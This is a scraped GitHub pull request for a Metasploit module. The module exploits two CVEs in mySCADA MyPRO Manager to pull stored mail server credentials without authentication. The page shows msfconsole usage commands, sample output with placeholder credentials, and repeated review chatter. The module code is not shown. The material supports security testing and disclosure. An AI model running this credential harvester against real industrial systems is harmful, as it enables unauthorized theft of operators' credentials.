mySCADA MyPRO Manager Credential Harvester (CVE-2025-24865 & CVE-2025-22896) Module #19878

h4x-x0r · 2025-02-13T20:17:07Z

This module exploits two vulnerabilities (CVE-2025-24865 & CVE-2025-22896) in mySCADA MyPRO Manager <= v1.3 to retrieve the configured credentials for the mail server.

The administrative web interface has certain features where credentials are required to be accessed, but the implementation is flawed, allowing to bypass the requirement. Other important administrative features do not require credentials at all, allowing an unauthenticated remote attacker to perform privileged actions. These issues are tracked through CVE-2025-24865.
Another vulnerability, tracked through CVE-2025-22896, is related to the cleartext storage of various credentials by the application.

One way how these issues can be exploited is to allow an unauthenticated remote attacker to retrieve the cleartext credentials of the mail server that is configured by the product, which this module does.

Verification Steps

Download the installer from the vendor and deploy it.
Start msfconsole
msf6 > use auxiliary/admin/scada/mypro_mgr_creds
msf6 auxiliary(admin/scada/mypro_mgr_creds) > set RHOSTS <IP>
msf6 auxiliary(admin/scada/mypro_mgr_creds) > run

Example output:

[*] Running module against 192.168.1.78

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Mail server credentials retrieved:
[+] Host: smtp.example.com
[+] Port: 993
[+] Auth Type: login
[+] User: user
[+] Password: SuperS3cr3t!
[*] Auxiliary module execution completed
msf6 auxiliary(admin/scada/mypro_mgr_creds) > creds
Credentials
===========

host          origin        service           public  private       realm  private_type  JtR Format  cracked_password
----          ------        -------           ------  -------       -----  ------------  ----------  ----------------
192.168.1.78  192.168.1.78  34022/tcp (http)  user    SuperS3cr3t!         Password

Successfully tested on

mySCADA MyPRO Manager 1.3 on Windows 11 (22H2)

CVE-2025-24865 & CVE-2025-22896

Removed ampersand

msutovsky-r7

Hi @h4x-x0r, I left a few comments about the code. I have trouble finding the vulnerable version, can you share where did you get it please?

modules/auxiliary/admin/scada/mypro_mgr_creds.rb

h4x-x0r added 2 commits February 8, 2025 02:22

CVE-2025-24865 & CVE-2025-22896

41a0e08

CVE-2025-24865 & CVE-2025-22896

Removed ampersand

85875d8

Removed ampersand

h4x-x0r changed the title ~~CVE-2025-24865 & CVE-2025-22896~~ mySCADA MyPRO Manager Credential Harvester (CVE-2025-24865 & CVE-2025-22896) Module Feb 13, 2025

update

5a9df32

msutovsky-r7 self-assigned this Feb 14, 2025

smcintyre-r7 added module rn-modules release notes for new or majorly enhanced modules labels Feb 14, 2025

msutovsky-r7 reviewed Feb 14, 2025

View reviewed changes

modules/auxiliary/admin/scada/mypro_mgr_creds.rb Outdated Show resolved Hide resolved

modules/auxiliary/admin/scada/mypro_mgr_creds.rb Show resolved Hide resolved

msutovsky-r7 added the docs label Feb 17, 2025

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

mySCADA MyPRO Manager Credential Harvester (CVE-2025-24865 & CVE-2025-22896) Module #19878

mySCADA MyPRO Manager Credential Harvester (CVE-2025-24865 & CVE-2025-22896) Module #19878

h4x-x0r commented Feb 13, 2025

msutovsky-r7 left a comment

mySCADA MyPRO Manager Credential Harvester (CVE-2025-24865 & CVE-2025-22896) Module #19878

Are you sure you want to change the base?

mySCADA MyPRO Manager Credential Harvester (CVE-2025-24865 & CVE-2025-22896) Module #19878

Conversation

h4x-x0r commented Feb 13, 2025

Verification Steps

msutovsky-r7 left a comment

Choose a reason for hiding this comment